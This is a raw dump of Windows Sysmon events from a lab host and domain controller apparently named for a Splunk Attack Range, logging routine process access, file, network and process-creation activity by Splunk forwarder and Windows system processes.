11:02:47.223{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1457-6216-AF04-000000003902}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-1457-6216-AF04-000000003902}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42CF71464681E9A0A90627CB28F29665,SHA256=778432A629A5364F98EEF124A8A47164B8A6C84BCD536AB985BEC6B892E4F4C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:48.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA9398D731190098B88507479F3D863,SHA256=5530763E3F3F3B75726DEF33AE0D6F95A515A6459F8E804D79E802201DD7B50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:48.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=910CDB1F0F0E27EFEAC0BFD59B80BE54,SHA256=3344C8F16CB41C4D6E7E0134DEFCA7188277B43B6AB91598E3158E60BF7AA107,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:48.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF73AE872B9D22B21EE6AAE8942F770,SHA256=5C55813F42C2FBBE6B3A42A2972DD81F82F578EAAAAA9E519978B1B6017F3DE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.717{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51482-false10.0.1.12-8089- 354300x8000000000000000218789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51481-false10.0.1.12-8000- 354300x8000000000000000294536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.600{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59058- 23542300x8000000000000000294538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:49.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA83CC9E5E0FC49B4A0CE6943AC0855,SHA256=3882B37463BAB5B9007A519417F306AD00312603ADE9D0F5B6500DD10E61F7F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1459-6216-B204-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1459-6216-B204-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.910{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1459-6216-B204-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.911{4F8D34B0-1459-6216-B204-000000003902}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.785{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17D8E96A9923485EE15CA0185E732310,SHA256=6A0BD4A6EADBC55C18596B65E987A1F9B379972514E734CFA64654775178BCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.707{4F8D34B0-1459-6216-B104-000000003902}27723424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1459-6216-B104-000000003902}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 